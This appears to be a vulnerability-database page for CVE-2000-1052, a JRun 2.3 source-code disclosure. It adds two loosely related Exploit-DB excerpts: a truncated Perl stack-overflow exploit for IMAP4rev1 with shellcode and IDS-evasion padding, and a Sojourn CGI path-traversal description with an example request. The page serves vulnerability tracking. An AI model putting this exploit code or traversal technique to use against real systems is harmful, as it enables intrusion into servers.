CVE-2000-1052
published 2000-12-11CVE-2000-1052: Allaire JRun 2.3 server allows remote attackers to obtain source code for executable content by directly calling the SSIFilter servlet.
PriorityP412medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.36%
68.2th percentile
Allaire JRun 2.3 server allows remote attackers to obtain source code for executable content by directly calling the SSIFilter servlet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| macromedia | jrun | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IMAP4rev1 10.190 - Authentication Stack Overflow
exploitdb·2001-01-19
CVE-2000-0284 IMAP4rev1 10.190 - Authentication Stack Overflow
IMAP4rev1 10.190 - Authentication Stack Overflow
---
#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: [email protected] / anno 2000
##
## This is nothing new - just wrote it for fun.
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";
$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.
if (@ARGV \n");
exit(1);
}
($target, $offset) = @ARGV;
for ($i = 0; $i < ($len - length($shellcode) - 1
Exploit-DB
Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access
exploitdb·2000-03-14
CVE-2000-0180 Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access
Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access
---
source: https://www.securityfocus.com/bid/1052/info
Any file that the webserver has read access to can be read on a server running the Sojourn search engine.
The Sojourn software includes the ability to organize a website into categories. These categories can then be accessed via the sojourn.cgi Perl script. This is done by making a request for a URL like:
http ://target/cgi-bin/sojourn.cgi?cat=categoryname
Each category has an associated .txt file based on the category name. The program appends the .txt extension onto the contents of the 'cat' variable. However, the program will accept and follow the '../' string in the variable contents, allowing read access to any .txt file the webserver can read.
This restric
No writeups or analysis indexed.
2000-12-11
Published